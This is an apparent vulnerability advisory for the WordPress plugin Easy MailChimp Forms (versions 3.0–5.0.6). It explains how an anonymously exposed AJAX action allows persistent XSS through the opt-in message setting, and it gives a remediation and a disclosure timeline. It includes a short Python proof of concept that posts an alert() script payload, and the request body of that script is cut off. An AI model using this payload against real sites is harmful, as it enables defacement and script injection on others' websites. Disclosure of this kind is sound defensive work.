Easy MailChimp Forms 3.0 - 5.0.6, Persistent XSS

Due to exposing a single AJAX function to anonymous users by using the ‘nopriv’ method of adding AJAX actions, anonymous users are able to update the settings for this plugin, including updating the Custom Opt-In Message with HTML content. Utilizing this method can result in a Persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.



CVSS Score


CSSS Vector


Attack Scope


Authorization Required



Remove the vulnerable AJAX definition in the ‘lib/lib.ajax.php’ file. If public access to some of the AJAX functions exposed by this definition is required, expose them utilizing a separate AJAX definition.

Proof of Concept

The following Python script will update the content of the Custom Opt-In Message with the content of the html_payload variable

import requests

html_payload = "<script>alert('.');</script>"
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {

r = requests.post(url, data=payload)


  • 2014-09-19: Discovered
  • 2014-09-19: Reported to vendor:
  • 2014-09-19: CVE requested
  • 2014-09-19: Vendor acknowledged and stated a fix would be made today
  • 2014-09-19: 5.0.7 released – issue resolved
  • 2014-09-22: CVE assigned
  • 2014-09-26: Advisory released